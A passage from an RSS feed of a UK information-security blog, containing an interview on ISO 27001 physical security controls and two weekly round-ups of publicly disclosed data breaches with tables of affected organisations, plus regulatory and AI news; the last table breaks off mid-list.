Get the latest expert insights straight to your inbox

If you like our weekly interviews, you’ll love our free weekly newsletter, the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Interviews with our experts, sharing their insights and expertise;
  • Industry news, including the latest publicly disclosed data breaches and cyber attacks;
  • Our latest research and statistics;
  • Free useful resources; and
  • Upcoming webinars.

The post Free Expert Insights: Index of Interviews appeared first on IT Governance UK Blog.

]]>
https://www.itgovernance.co.uk/blog/free-expert-insights/feed 0
ISO 27001 and Physical Security https://www.itgovernance.co.uk/blog/iso-27001-and-physical-security Wed, 15 May 2024 10:41:07 +0000 https://www.itgovernance.co.uk/blog/?p=46425 Physical access control, physical security monitoring, CCTV, and more When we hear the term ‘information security’ – or, for that matter, ‘ISO 27001’ – our thoughts usually turn straight to cyber security. However, physical security is also an important aspect of information and data security. In fact, in the 2022 versions of ISO 27001 and ISO 27002, ‘physical’ is one of just four control themes. As such, the Standards also list explicit physical security controls, which organisations must either implement or justify why they don’t need to in their SoA (Statement of Applicability) to certify against ISO 27001. Matthew Peers,

The post ISO 27001 and Physical Security appeared first on IT Governance UK Blog.

]]>
Physical access control, physical security monitoring, CCTV, and more

When we hear the term ‘information security’ – or, for that matter, ‘ISO 27001’ – our thoughts usually turn straight to cyber security.

However, physical security is also an important aspect of information and data security. In fact, in the 2022 versions of ISO 27001 and ISO 27002, ‘physical’ is one of just four control themes.

As such, the Standards also list explicit physical security controls, which organisations must either implement or justify why they don’t need to in their SoA (Statement of Applicability) to certify against ISO 27001.

Matthew Peers, one of our GRC (governance, risk and compliance) consultants, helps organisations implement the Standard and prepare for ISO 27001 certification.

Before joining IT Governance, Matthew served in the British Army Intelligence Corps for 12 years, providing intelligence and security advice to personnel and their families in the UK and abroad. This included conducting physical security surveys of British Army bases in the south of England.

Just the man to talk to about ISO 27001 and physical security!


In this interview

  • Why ‘physical’ is a separate control theme
  • Physical (and logical) access controls and visitor policies
  • Why physical security monitoring needed a new Annex A control
  • The benefits and drawbacks of CCTV as a preventive and detective measure
  • Key considerations around building security – even if you’re a small organisation
  • How to remotely audit physical security
  • Remote-working tips

One of the big changes in the 2022 editions of ISO 27001 and ISO 27002 are the four themes, one of which is physical. Is this an acknowledgement that physical security can be overlooked?

I’d say that the separate category just filters out those controls better.

Since COVID, many organisations operate remotely. So, for the purposes of control selection, many physical security controls can be justifiably excluded if all staff work from home.

Having a separate category for those controls makes this more practical to do.

For the organisations that still have a physical location, what physical security measures must they consider?

They should look at their overall physical security system[s]. That said, one big thing clients often talk me through is their visitor policy: how do they process visitors? How do they make sure visitors only go to the designated areas? And so on.

This fits into a wider conversation around physical access control. Just because someone is an employee, doesn’t mean they should be allowed to go everywhere.

For example, if you have a room that stores sensitive information or equipment, only those who have a need to see or use it should be able to access that room.

Similar principles apply to logical access: organisations must restrict this on a need-to-know basis and by the principle of least privilege [PoLP].

What access controls should organisations implement?

Common logical [cyber/digital] access controls include passwords and MFA [multifactor authentication], firewalls, and network segmentation and segregation. Ideally, you’d apply these in a zero-trust architecture.

For physical security, you can use:

  • The simple but effective key and lock;
  • A combination lock or PIN pad; or
  • Card readers.

You could also use biometric access control, but using biometric data is subject to stricter legal requirements around privacy [under the UK GDPR – General Data Protection Regulation].

What about physical security monitoring?

That’s the only new control introduced in the 2022 Standards for the ‘physical’ theme. Control 7.4: “Premises should be continuously monitored for unauthorized physical access.”

This could be something like CCTV, or a human element – a security guard, whether physically near the door or at the other end of a switchboard.

Alarms are good, too, but they raise questions like who’s going to come in to investigate when it goes off at, say, 4:00 am on a Saturday.

Why was a new, separate control for physical security monitoring needed?

It gives you enhanced peace of mind.

Suppose you own a lot of sensitive equipment and are in an area with a high crime rate [an aspect of environmental security]. You’d want that peace of mind that you’ll become aware of anyone interfering with your equipment.

In this respect, CCTV and other security monitoring act as both preventive measures – i.e. a deterrent – and detective measures. They’ll help detect suspicious activity, but also deter burglars. CCTV won’t stop everyone, but it’ll make at least a few people think twice, knowing their actions will be caught on camera.

In fact, CCTV can work well as a forensic measure, too. If someone does break in, CCTV can help identify the culprit. At the very least, it can inform the police where to dust for fingerprints, as the cameras show which surfaces the burglar has touched.

What are the risks or drawbacks around CCTV?

Cameras aren’t infallible – they can be covered up or out of order, for example.

Then there’s the footage itself – recordings might be overwritten, and you’re only going to keep them for a certain period anyway, if only for the sake of cost.

In addition, you need to be aware of your privacy obligations. Ensure that people know they’re being recorded – e.g. via a clearly visible CCTV notice – and why you’re collecting that data.

[This guide to the GDPR and CCTV in the workplace discusses this in more detail.]

So, control 7.4 in ISO 27001 isn’t accounting for a new phenomenon, but filling in a gap in the old Standard?

Yes, it just brings ISO 27001 up to date. Plus, ISO 27002 provides guidance beyond just installing video monitoring systems and intruder alarms – it also raises points like preventing them from being disabled remotely.

By formalising this as a control, organisations can get clearer guidance on its various aspects. They’ll also be less prone to overlooking things.

[Note: ISO 27002 provides generic guidance on how to implement each control in Annex A of ISO 27001.]

The ‘physical’ theme in ISO 27001:2022 and ISO 27002:2022 contains relatively few controls. Which are the most important?

The controls around building access:

  • How will you control access to your physical premises?
  • How will you identify who is and isn’t permitted to enter?
  • How will you keep unauthorised staff and other people out of restricted areas?

It’s about not overlooking anything. You may, for example, have your HR team in one part of the building to keep sensitive personal information about staff separate from, say, the sales team.

For similar reasons, you’d want to separate finance, too – very few people need access to financial information, so make sure you restrict it on a need-to-know basis.

What you don’t want to do is mix teams. When all finance staff sit together, it doesn’t matter whether one person looks at another’s screen and sees confidential financial data. But you can’t police casual glances from, say, a sales employee sitting next to finance staff.

Again, even vetted staff shouldn’t be seeing information not relevant to their job – particularly where that information is sensitive.

What if you’re a small organisation, with very few staff?

Even when you have different functions sitting in the same small room, you can designate a quiet space for sensitive work.

Or you can position screens in such a way that you can’t see what the person is working on if, for example, you walked into the managing director’s office. If you’re then invited to look at their screen, the director can make sure you can only see what you need to.

What, if any, aspect of physical security do you believe is overlooked?

Actually, organisations do quite a good job at this. Many are very switched on and alert about the physical side – the cyber side is where more problems emerge. That may be due to a lack of experience – we’ve had to think about physical security long before the Internet emerged.

Situations like having multiple organisations within the same tall building are so common. It’s very normal to have, say, a tenth-floor office, with staff given a key card that only gives them access to that floor and the front door of the building.

Or if you have a visitor, they’d call at the front-desk reception, who then sends them to the correct floor and lets you know to buzz them in, or whatever.

Can you remotely audit physical security?

With cameras! An auditee will use something like a camera phone or laptop, then walk and talk the auditor through the process.

So, they’d say something like: ‘I’m standing outside the building. I’m now going to get my key card out and swipe into the building. If I was a guest, I’d call into reception here. I’d press that button, then tell the receptionist who I am and who I’ve come to see.

‘The receptionist then gives me a visitor lanyard, and phones the office. Someone from the office then comes down to show me upstairs.’

Admittedly, you get a better feel for the physical security when you’re there. Not least because you’re the visitor in that scenario.

But the remote camera makes for a good substitute in, say, a lockdown situation. Or when the organisation spans multiple premises. This is a particularly good option for internal audits, rather than certification audits, where the auditor would need a higher level of assurance.

Speaking of remote, even when all staff are home-based, work still involves a physical element, such as their home offices. What can organisations do to address those risks?

A remote working policy is a good place to start. This should cover things like physically securing company equipment. For example:

  • Avoid working in public
  • Only use secured Wi-Fi networks
  • Never leave your equipment unattended in public
  • When travelling by car, put the equipment in the car boot
  • When travelling by plane, put laptops, etc. in your carry-on luggage

Also, don’t let unauthorised people use the device!

Last November, a Scottish minister let his children use his tablet, running up a massive bill. He’d initially charged the taxpayer for that, but that aside, unauthorised users – family included – mustn’t gain access to company equipment under any circumstances.

What are some other remote-working tips?

Remote working typically involves putting stuff in the Cloud – old-school server and communications rooms are dying off.

Involving a Cloud service provider means you’re sharing the risk. Your data might be managed and secured by the provider, but you remain responsible for that data, legally speaking.

So, ask questions like:

  • What assurances can the provider give around security?
  • How will I make sure I can retrieve the data in the Cloud at any time?
  • What third-party suppliers does your provider use, where are they based, and how do you know you can trust them?

Under ISO 27001:2022, supply chain management stretches across multiple controls:

  • 5.19: Information security in supplier relationships
  • 5.20: Addressing information security within supplier agreements
  • 5.21: Managing information security in the ICT supply chain
  • 5.22: Monitoring, review and change management of supplier services
  • 5.23: Information security for use of Cloud services [another new control]

That signals its importance to overall information security. If your supply chain isn’t secure, nor are you.

Note: To learn more about how to simplify supply chain risk management, check out this interview with Andrew Pattison, head of GRC consultancy at IT Governance Europe.


Looking to improve staff awareness around physical security?

Our 45-minute Physical Security Staff Awareness E-learning Course may be just the thing.

This engaging course teaches staff what physical security is, and how they can contribute to keeping their workplace and your assets secure. It also addresses the threats posed by remote working.

 

More interested in general information security awareness training for staff? Check out our Information Security Staff Awareness Elearning Suite.


We hope you enjoyed this edition of our ‘Expert Insight’ series. We’ll be back soon, chatting to another expert with GRC International Group.

In the meantime, why not check out our interview with Group CEO Alan Calder about transitioning to ISO 27001:2022?

Alternatively, explore our full index of interviews here.

The post ISO 27001 and Physical Security appeared first on IT Governance UK Blog.

]]>
6,009,014 MovieBoxPro Accounts Breached in Another Data Scraping Incident https://www.itgovernance.co.uk/blog/6009014-movieboxpro-accounts-breached-in-another-data-scraping-incident Tue, 07 May 2024 13:35:19 +0000 https://www.itgovernance.co.uk/blog/?p=46405 Plus, a further 3,029,461 known records newly breached Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Publicly disclosed data breaches and cyber attacks: in the spotlight More than 6 million accounts compromised from streaming service MovieBoxPro MovieBoxPro, a streaming service of “questionable legality”, suffered a data scraping incident on 15 April 2024, according to Have I Been Pwned. Data scraping is a typically automated

The post 6,009,014 MovieBoxPro Accounts Breached in Another Data Scraping Incident appeared first on IT Governance UK Blog.

]]>
Plus, a further 3,029,461 known records newly breached

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

More than 6 million accounts compromised from streaming service MovieBoxPro

MovieBoxPro, a streaming service of “questionable legality”, suffered a data scraping incident on 15 April 2024, according to Have I Been Pwned.

Data scraping is a typically automated process that extracts information from websites, allowing criminals to compile data sets containing personal information.

The data breached included usernames and email addresses.

Reportedly, the vulnerability has now been mitigated.

Data breached: 6,009,014 accounts.

A further 381,000 New York City public school students affected by 2022 data breach

In January 2022, personal data from around 820,000 New York City public school students, both current and former, was breached.

It emerged this week, according to the New York City Department of Education, that data from a further 381,000 students was also compromised in this incident.

Data breached: 1,201,000 people’s data.

At least 191 Australian organisations affected by ZircoDATA ransomware attack

The ransomware group BlackBasta listed Australia-based ZircoDATA as a victim in February, allegedly exfiltrating 395 GB of data.

This week, it turns out at least 191 further Australian organisations, including government entities, were affected by this breach, highlighting the risks of supply chain attacks. Apparently, the data belongs to tens of thousands of Australians.

Data breached: 395 GB.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 9,038,475 records known to be compromised, and 258 organisations suffering a newly disclosed incident. 253 of them are known to have had data exfiltrated, exposed or otherwise breached. None definitely haven’t had data breached.

We also found 11 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
MovieBoxPro
Source 1; source 2
(New)
LeisureChina?Yes6,009,014
New York City public school
Source 1; source 2
(Update)
EducationUSAYes1,201,000
ClubsNSW (via Outabox)
Source
(New)
HospitalityAustraliaYes1,050,169
Firstmac
Source
(New)
FinanceAustraliaYes>500 GB
ZircoDATA and 191 Australian organisations
Source 1; source 2
(Update on ZircoDATA; other affected organisations new)
 IT services and unknown (but includes public)AustraliaYes395 GB
Continuum Health Alliance, LLC
Source 1; source 2
(Update)
HealthcareUSAYes377,119
MedStar Health
Source
(New)
HealthcareUSAYes183,079
OrthoConnecticut
Source
(New)
HealthcareUSAYes118,141
Companies Registry
Source
(New)
PublicHong KongYes110,000
Bluebonnet Trails Community Services
Source
(New)
HealthcareUSAYes76,165
Enstar (US) Inc.
Source 1; source 2
(Update)
InsuranceUSAYes75,101
Airsoftc3.com
Source
(New)
SoftwareUSAYes75,000
Hôpital de Cannes – Simone Veil
Source 1; source 2
(Update)
HealthcareFranceYes61 GB
Associated Wholesale Grocers
Source
(New)
RetailUSAYes26,579
The Philadelphia Inquirer
Source 1; source 2
(Update)
MediaUSAYes25,549
Bay Oral Surgery & Implant Center
Source
(New)
HealthcareUSAYes13,055
Bousquet Holstein PLLC
Source
(New)
LegalUSAYes12,690
Lamont, Hanley & Associates, Inc.
Source
(New)
FinanceUSAYes11,484
Inteplast Group
Source
(New)
ManufacturingUSAYes7,717
Dental Health Services
Source
(New)
InsuranceUSAYes6,340
Los Angeles County Department of Health Services
Source
(New)
PublicUSAYes6,085
Bundeswehr
Source
(New)
DefenceGermanyYes>6,000
Empath Health
Source
(New)
HealthcareUSAYes5,545
Liberty University
Source
(New)
EducationUSAYes5,434
States of Guernsey
Source
(New)
PublicUKYes>5,000
West Idaho Orthopedics
Source 1; source 2
(Update)
HealthcareUSAYes5,000
Health First Urgent Care
Source
(New)
HealthcareUSAYes4,538
Dohman Akerlund & Eddy
Source
(New)
FinanceUSAYes3,687
Illinois State Credit Union
Source
(New)
FinanceUSAYes3,084
Mana Products
Source
(New)
ManufacturingUSAYes2,470
Bluegrass Care Navigators
Source
(New)
HealthcareUSAYes2,282
Directive Communication Systems
Source
(New)
FinanceUSAYes1,546
VeriSource Services, Inc.
Source
(New)
IT servicesUSAYes1,382
Worthen Industries
Source 1; source 2
(Update)
ManufacturingUSAYes1,277
R.J. Grondin & Sons
Source
(New)
ConstructionUSAYes741
Mt Hira College
Source
(New)
EducationAustraliaYes>700
WELBRO Building Corporation
Source 1; source 2
(Update)
ConstructionUSAYes693
American Renal Management LLC
Source
(New)
HealthcareUSAYes501
Rebound Orthopedics & Neurosurgery
Source 1; source 2
(Update)
HealthcareUSAYes500
Chambers Construction Co.
Source
(New)
ConstructionUSAYes489
ClearVision Optical
Source
(New)
RetailUSAYes261
Symphony Financial, LLC.
Source
(New)
FinanceUSAYes151
City of Pensacola Government
Source 1; source 2
(Update)
PublicUSAYes22
Edenred
Source
(New)
FinanceBelgiumYes10
Victorian Ambulance Union Incorporated
Source
(New)
Non-profitAustraliaYesUnknown
Qantas
Source
(New)
TransportAustraliaYesUnknown
BC Libraries Cooperative
Source
(New)
IT servicesCanadaYesUnknown
The Post Millennial
Source
(New)
MediaCanadaYesUnknown
Cariboo Regional District Library Network
Source
(New)
PublicCanadaYesUnknown
Digicel Group
Source
(New)
TelecomsEl SalvadorYesUnknown
Magnet+
Source
(New)
TelecomsIrelandYesUnknown
Mellitah Oil and Gas B.V
Source
(New)
EnergyItalyYesUnknown
Bitvavo
Source
(New)
CryptoNetherlandsYesUnknown
Shook Lin & Bok Singapore
Source
(New)
LegalSingaporeYesUnknown
University of Alicante
Source
(New)
EducationSpainYesUnknown
io.net
Source
(New)
BlockchainUSAYesUnknown
Virginia Union University
Source
(New)
EducationUSAYesUnknown
George F. Young, Inc.
Source
(New)
EngineeringUSAYesUnknown
OE Federal Credit Union
Source
(New)
FinanceUSAYesUnknown
Harlowe
Source
(New)
HealthcareUSAYesUnknown
Northern California Behavioral Health System
Source
(New)
HealthcareUSAYesUnknown
Primary Care Health Partners
Source
(New)
HealthcareUSAYesUnknown
Panda Restaurant Group
Source
(New)
HospitalityUSAYesUnknown
CAI Technologies
Source
(New)
IT servicesUSAYesUnknown
SUN SSC
Source
(New)
IT servicesUSAYesUnknown
Formosa Plastics Corporation, U.S.A.
Source
(New)
ManufacturingUSAYesUnknown
Human Events.
Source
(New)
MediaUSAYesUnknown
GDI Services, Inc.
Source
(New)
Professional servicesUSAYesUnknown
Sterling Plumbing Inc.
Source
(New)
Professional servicesUSAYesUnknown
City of Wichita Kansas
Source
(New)
PublicUSAYesUnknown
Dropbox
Source
(New)
SoftwareUSAYesUnknown
Pike Finance
Source
(New)
BlockchainUnknownYesUnknown
La Nacion
Source
(New)
MediaArgentinaUnknownUnknown
London Drugs
Source
(New)
RetailCanadaUnknownUnknown
Superintendencia del Subsidio Familiar
Source
(New)
PublicColombiaUnknownUnknown
Diario El Salvador
Source
(New)
PublicEl SalvadorUnknownUnknown
Hong Kong Arts Development Council
Source
(New)
PublicHong KongUnknownUnknown

Note 1: ‘New’/‘Update’ in the first column refers to whether this breach was first publicly disclosed this week, or whether a significant update was released this week. The updated data point is italicised in the table.

Note 2: For incidents where we only know the file size of the data breached, we use the formula 1 MB = 1 record. Given that we can’t know the exact numbers, as it depends on the types of records included (e.g. pictures and medical histories are considerably larger files than just names and addresses), we err on the side of caution by using this formula. We believe that this underestimates the records breached in most cases, but it is more accurate than not providing a number at all. To learn more about our research methodology, click here.


AI

noyb files complaint against OpenAI for not correcting inaccurate information

The non-profit noyb filed a complaint against OpenAI with the Austrian data watchdog for failing to meet a key GDPR requirement: that personal data is accurate, and that data subjects have full access to that data along with source information.

noyb says: “OpenAI openly admits that it is unable to correct incorrect information on ChatGPT. Furthermore, the company cannot say where the data comes from or what data ChatGPT stores about individual people. The company is well aware of this problem, but doesn’t seem to care.”

Also this week, a group of US newspapers sued OpenAI and Microsoft for misusing their reporters’ writing to train their AI systems.

ICO publishes its response to regulating AI consultation

With the ICO (Information Commissioner’s Office) consultation on “Regulating AI: the ICO’s strategic approach – a response to the DSIT Secretary of State” now closed, the UK regulator has published its response.

New publications by DHS and NIST to help ensure safety and security of AI systems, as instructed by EO 14110

The US Department of Homeland Security has developed safety and security guidelines for critical infrastructure operators, as tasked by Executive Order 14110: “Safe, Secure, and Trustworthy Development and Use of Artificial Intelligence”.

Also this week, NIST released four draft publications “intended to help improve the safety, security and trustworthiness of [AI] systems”.


Enforcement

New UK laws for IoT device security

The UK government has published new laws, mandating Internet-connected smart devices to meet a minimum security standard. Most notably, it’s banning bad default passwords on IoT (Internet of Things) devices, becoming the first country to do so.

Group CEO Alan Calder commented:

It’ll certainly improve the long-term robustness of the UK’s cyber security infrastructure – but that’ll only be gradual, because it only applies to new devices.

The laws don’t apply retrospectively to the millions of inadequately protected smart devices already in service – and which are replaced over decades rather than months.

So, there won’t be any immediate benefit in terms of reduction in data breaches – progress on that front will continue to depend on better-educated consumers!

FCC fines four wireless carriers $196 million

The US Federal Communications Commission has fined four large US wireless carriers – AT&T, Sprint, T-Mobile and Verizon – $196 million for illegally sharing access to customers’ location data.

Unrelated, AT&T also recently suffered a large data breach, affecting more than 51 million customers’ data.

Three new GDPR fines

The ICO issued a £7,500 fine under the UK GDPR to Central Young Men’s Christian Association for failing to use Bcc, thereby revealing HIV status.

Under the EU GDPR, the Czech supervisory authority issued a €13.9 million fine for violating Articles 6 and 13. Meanwhile, the Greek authority issued the Hellenic Post a fine of 1% of the most recent global annual turnover for violating Articles 5(1)(f) and 32.


Other news

Security research team finds nearly 3 million Docker Hub repositories host malicious content

JFrog and Docker partnered for security research, finding that nearly 3 million Docker Hub repositories – almost 20% of all public repositories – host malicious content.

ICO and Ofcom publish statement on collaboration on regulating online services

Two UK regulators, the ICO and Ofcom (the UK’s communications regulator) have published a joint statement on “the regulation of online services where online safety and data protection intersect” to ensure “a coherent approach to regulation”.


New guidance

New NCSC guidance: AMS (Advanced Mobile Solutions)

The UK NCSC (National Cyber Security Centre) has published new guidance, called ‘AMS’ or ‘Advanced Mobile Solutions’. This risk model, along with “a set of architecture patterns and associated technologies” allows “high-threat organisations to stay connected ‘on the go’.”


Recently published reports


That’s it for this week’s round-up. We hope you found it useful.

We’ll be back next week with the biggest and most interesting news stories, all rounded up in one place.

In the meantime, if you missed it, check out last week’s round-up. Alternatively, you can view our full archive.


Security Spotlight

To get news of the latest data breaches and cyber attacks straight to your inbox, subscribe to our weekly newsletter: the Security Spotlight.

Every Wednesday, you’ll get a 4-minute email with:

  • Industry news, including this weekly round-up;
  • Our latest research and statistics;
  • Interviews with our experts, sharing their insights and expertise;
  • Free useful resources; and
  • Upcoming webinars.

The post 6,009,014 MovieBoxPro Accounts Breached in Another Data Scraping Incident appeared first on IT Governance UK Blog.

]]>
The Week in Cyber Security and Data Privacy: 15 – 21 April 2024 https://www.itgovernance.co.uk/blog/the-week-in-cyber-security-and-data-privacy-15-21-april-2024 Mon, 22 Apr 2024 16:25:34 +0000 https://www.itgovernance.co.uk/blog/?p=46323 16,482,365 known records breached in 241 newly disclosed incidents Welcome to this week’s global round-up of the biggest and most interesting news stories. At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks. Publicly disclosed data breaches and cyber attacks: in the spotlight Criminal hackers threaten to leak World-Check screening database A criminal group known as GhostR claims to have stolen 5.3 million records from World-Check, a database used to screen potential customers for links to illegal activity and government

The post The Week in Cyber Security and Data Privacy: 15 – 21 April 2024 appeared first on IT Governance UK Blog.

]]>
16,482,365 known records breached in 241 newly disclosed incidents

Welcome to this week’s global round-up of the biggest and most interesting news stories.

At the end of each month, these incidents – and any others that we find – will be used to inform our monthly analysis of data breaches and cyber attacks.


Publicly disclosed data breaches and cyber attacks: in the spotlight

Criminal hackers threaten to leak World-Check screening database

A criminal group known as GhostR claims to have stolen 5.3 million records from World-Check, a database used to screen potential customers for links to illegal activity and government sanctions.

Compromised data includes names, passport numbers, Social Security numbers, online crypto account identifiers and bank account numbers.

A spokesman for the London Stock Exchange Group, which maintains the database, confirmed the data was illegally obtained from a third party and didn’t dispute the amount of data stolen. GhostR says it obtained the records from a Singapore-based company with access to the database.

Data breached: 5,300,000 records.

Almost 1.5 million accounts compromised in Le Slip Français data breach

The French underwear manufacturer Le Slip Français has suffered a data breach. The alleged perpetrator, who goes by the name ShopifyGUY, claims to have obtained more than 1.5 million emails, including 690,000 sets of customer details comprising email addresses, names, postal addresses, phone numbers and purchase data.

ShopifyGUY is the same person who posted the Giant Tiger data last week. According to Troy Hunt of the data breach notification service HIBP (Have I Been Pwned), “it looks like they’re finding @Shopify keys somewhere then just dumping all the data. I’m told the JSON format these breaches all appear in is consistent with that, so it stands to reason that’s the common vector for all these breaches”.

Hunt has added 1,495,127 Le Slip Français accounts to the HIBP database.

Data breached: 1,495,127 accounts.

Mobile Guardian app hacked, compromising Singaporean parent and teacher data

The names and email addresses of parents and teachers from 5 primary and 122 secondary schools in Singapore have been compromised after a mobile app was hacked. Mobile Guardian, which is used to help parents manage their children’s device usage, was hacked on 19 April, according to the Singaporean Ministry of Education.

Mobile Guardian, which is based in the UK, said that its investigations detected unauthorised access to its systems via an administrative account on its management portal. Account records from the US were also accessed.

Data breached: unknown.


Publicly disclosed data breaches and cyber attacks: full list

This week, we found 16,482,365 records known to be compromised, and 241 organisations suffering a newly disclosed incident. 227 of them are known to have had data exfiltrated, exposed or otherwise breached. Only 6 definitely haven’t had data breached.

We also found 8 organisations providing a significant update on a previously disclosed incident.

Organisation(s)SectorLocationData breached?Known data breached
World-Check, and a Singapore-based firm with access to it
Source
(New)
Finance and unknownUK and SingaporeYes5,300,000
Digi Yatra
Source
(New)
SoftwareIndiaYes>3,300,000
Le Slip Français
Source 1; source 2; source 3
(Update)
RetailFranceYes1,495,127
XD Connects
Source
(New)
RetailNetherlandsYes1 TB
DISB (District of Columbia Department of Insurance, Securities and Banking) and Tyler Technologies
Source 1; source 2; source 3; source 4
(Update)
Public and softwareUSAYes800 GB
Smoke Alarm Solutions
Source
(New)
Professional servicesAustraliaYes762,856
City of St. Cloud, FL
Source
(Update)
PublicUSAYes719,597
Regulator Marine Inc
Source
(New)
ManufacturingUSAYes630 GB
Risas Dental and Braces
Source 1; source 2
(New)
HealthcareUSAYes618,189
HUB International
Source
(New)
InsuranceUSAYes514,477
Lee University
Source 1; source 2
(New)
EducationUSAYes387.49 GB
Village Family Dental
Source 1; source 2
(New)
HealthcareUSAYes240,214
Cherry Health
Source 1; source 2
(Update)
HealthcareUSAYes184,372
Arby’s
Source 1; source 2
(New)
HospitalityUSAYes175 GB
Albatros
Source
(New)
ManufacturingRussiaYes>100 GB
T2 Tea
Source 1; source 2
(New)
RetailAustraliaYes85,894
Argentinian database of driving licences
Source
(New)
PublicArgentinaYes70,000
sa.global
Source
(New)
IT servicesUSAYes41 GB
Blackstone Valley Community Health Care
Source 1; source 2
(Update)
HealthcareUSAYes34,416
Green Diamond Resource Company
Source
(New)
EnvironmentalUSAYes27,896
Kisco Senior Living
Source
(New)
HealthcareUSAYes26,663
Roman Catholic Diocese of Phoenix
Source
(New)
ReligiousUSAYes23,853
Bi-State Development
Source
(New)
PublicUSAYes21,953
University of Tennessee Health Science Center
Source 1; source 2
(New)
EducationUSAYes19,353
Township of Montclair
Source
(New)
PublicUSAYes17,835
Carl Buddig and Company
Source
(New)
HospitalityUSAYes11,830
Asteco Property Management
Source
(New)
Real estateUAEYes11.4 GB
Ministry of Public Health and Social Assistance
Source
(New)
PublicDominican RepublicYes>8,000
Island Ambulatory Surgery Center
Source 1; source 2
(New)
HealthcareUSAYes7,900
Federal Penitentiary Service
Source
(New)
PublicArgentinaYes7,115
Taft Stettinius & Hollister LLP
Source 1; source 2
(Update)
LegalUSAYes5,980
Citizens Property Insurance Corporation
Source
(New)
InsuranceUSAYes4,948
Northern Colorado Long Term Acute Hospital
Source 1; source 2
(New)
HealthcareUSAYes4,335
Numotion
Source
(New)
ManufacturingUSAYes4,190
Olive View – UCLA Medical Center
Source 1; source 2
(New)
EducationUSAYes3,716
Butler, Lavanceau & Sober, LLC
Source
(New)
FinanceUSAYes3,370
Catholic Medical Center
Source
(New)
HealthcareUSAYes2,792
Concorde Entertainment Group
Source
(New)
HospitalityCanadaYes2 GB
Atlanta Technical College
Source
(New)
EducationUSAYes1,523
WIS International
Source
(New)
RetailUSAYes1,295
HBL CPAs, P.C.
Source
(New)
FinanceUSAYes1,206
DES
Source
(New)
EngineeringUSAYes1,144
Baylor College of Medicine
Source 1; source 2; source 3
(Update)
EducationUSAYes801
Medical Home Network
Source
(New)
HealthcareUSAYes681
Moveable Feast
Source
(New)
Non-profitUSAYes568
Jackson Medical Center
Source 1; source 2
(New)
HealthcareUSAYes509
Washington County Department of Human Services
Source 1; source 2
(New)
PublicUSAYes501
Basingstoke MP Maria Miller
Source
(New)
PublicUKYes500
SMRT Architects & Engineers
Source 1; source 2
(Update)
EngineeringUSAYes348
Pandemonium Rocks
Source
(New)
LeisureAustraliaYes“hundreds”
EBIR Bathroom Lighting
Source
(New)
ManufacturingSpainYes200 MB
Former Manx Care employee
Source
(New)
HealthcareUKYes160
Big Ass Fans
Source
(New)
ManufacturingUSAYes146
Cocoon, Inc.
Source
(New)
ManufacturingUSAYes50
Avalon Trust
Source
(New)
FinanceUSAYes27
Grodno Azot
Source
(New)
ManufacturingBelarusYesUnknown
Canadia Bank
Source
(New)
FinanceCambodiaYesUnknown
ND Paper
Source
(New)
MediaChinaYesUnknown
Kameymall
Source
(New)
RetailChinaYesUnknown
UNDP (United Nations Development Programme)
Source
(New)
Non-profitDenmarkYesUnknown
Consejo de la Judicatura
Source
(New)
LegalEcuadorYesUnknown
Ministerio de Educación, Ciencia y Tecnología de El Salvador
Source
(New)
PublicEl SalvadorYesUnknown
Lyon Terminal
Source 1; source 2
(New)
TransportFranceYesUnknown
Volkswagen
Source
(New)
ManufacturingGermanyYesUnknown
Union Hospital
Source
(New)
HealthcareHong KongYesUnknown
QUEST Alliance
Source
(New)
Non-profitIndiaYesUnknown
Extern
Source
(New)
CharityIrelandYesUnknown
Coppel
Source 1; source 2
(New)
RetailMexicoYesUnknown
Iddink Group
Source
(New)
IT servicesNetherlandsYesUnknown
Nieuwsbank
Source
(New)
MediaNetherlandsYesUnknown
Hamdard Pakistan
Source
(New)
ManufacturingPakistanYesUnknown
Pak Suzuki Motor Company Limited
Source
(New)
ManufacturingPakistanYesUnknown
Ministry of Finance, Republic of Serbia
Source
(New)
PublicSerbiaYesUnknown
5 primary and 122 secondary schools in Singapore, through Mobile Guardian
Source
(New)
Education and softwareSingaporeYesUnknown
International Trade Administration Commission of SA
Source
(New)
PublicSouth AfricaYesUnknown
AsiaLove
Source
(New)
SoftwareSouth KoreaYesUnknown
Lopesan
Source 1; source 2
(New)
HospitalitySpainYesUnknown
ASESGC Guardia Civil
Source
(New)
Non-profitSpainYesUnknown
Bagcilar Education and Research Hospital
Source
(New)
HealthcareTurkeyYesUnknown
Bureau van Dijk
Source
(New)
Professional servicesUKYesUnknown
Zest Protocol
Source
(New)
CryptoUKYesUnknown
Companies House
Source
(New)
PublicUKYesUnknown
Tasteful Selections LLC
Source
(New)
AgriculturalUSAYesUnknown
Cisco Duo and its telephony supplier
Source
(New)
Cyber security and telecomsUSAYesUnknown
Brandeis University
Source
(New)
EducationUSAYesUnknown
ASMFC (Atlantic States Marine Fisheries Commission)
Source
(New)
EnvironmentalUSAYesUnknown
Bauknight Pietras & Stormer, P.A.
Source
(New)
FinanceUSAYesUnknown
BlueChip Financial
Source
(New)
FinanceUSAYesUnknown
Continuing Healthcare Solutions
Source
(New)
HealthcareUSAYesUnknown
SysInformation
Source
(New)
HealthcareUSAYesUnknown
Space-Eyes
Source
(New)
IT servicesUSAYesUnknown
VIP (Visionary Integration Professionals)
Source
(New)
IT servicesUSAYesUnknown
Allcare Pharmacy | W.P. Malone, Inc.
Source
(New)
ManufacturingUSAYesUnknown
Cembell Industries Inc
Source
(New)
ManufacturingUSAYesUnknown
HB Molding, Inc.
Source
(New)
ManufacturingUSAYesUnknown
The Post and Courier
Source
(New)
MediaUSAYesUnknown
European Wax Center
Source
(New)
Professional servicesUSAYesUnknown
Solano County Library
Source
(New)
PublicUSAYesUnknown
Blooms Today
Source
(New)
RetailUSAYesUnknown
Payroll Select Services
Source
(New)
SoftwareUSAYesUnknown
Unspecified US consumer database
Source
(New)
UnknownUSAYesUnknown
Frontier Internet
Source
(New)
TelecomsUSAYesUnknown
Hedgey
Source
(New)
BlockchainUnknownYesUnknown
Honda Vietnam Company Limited
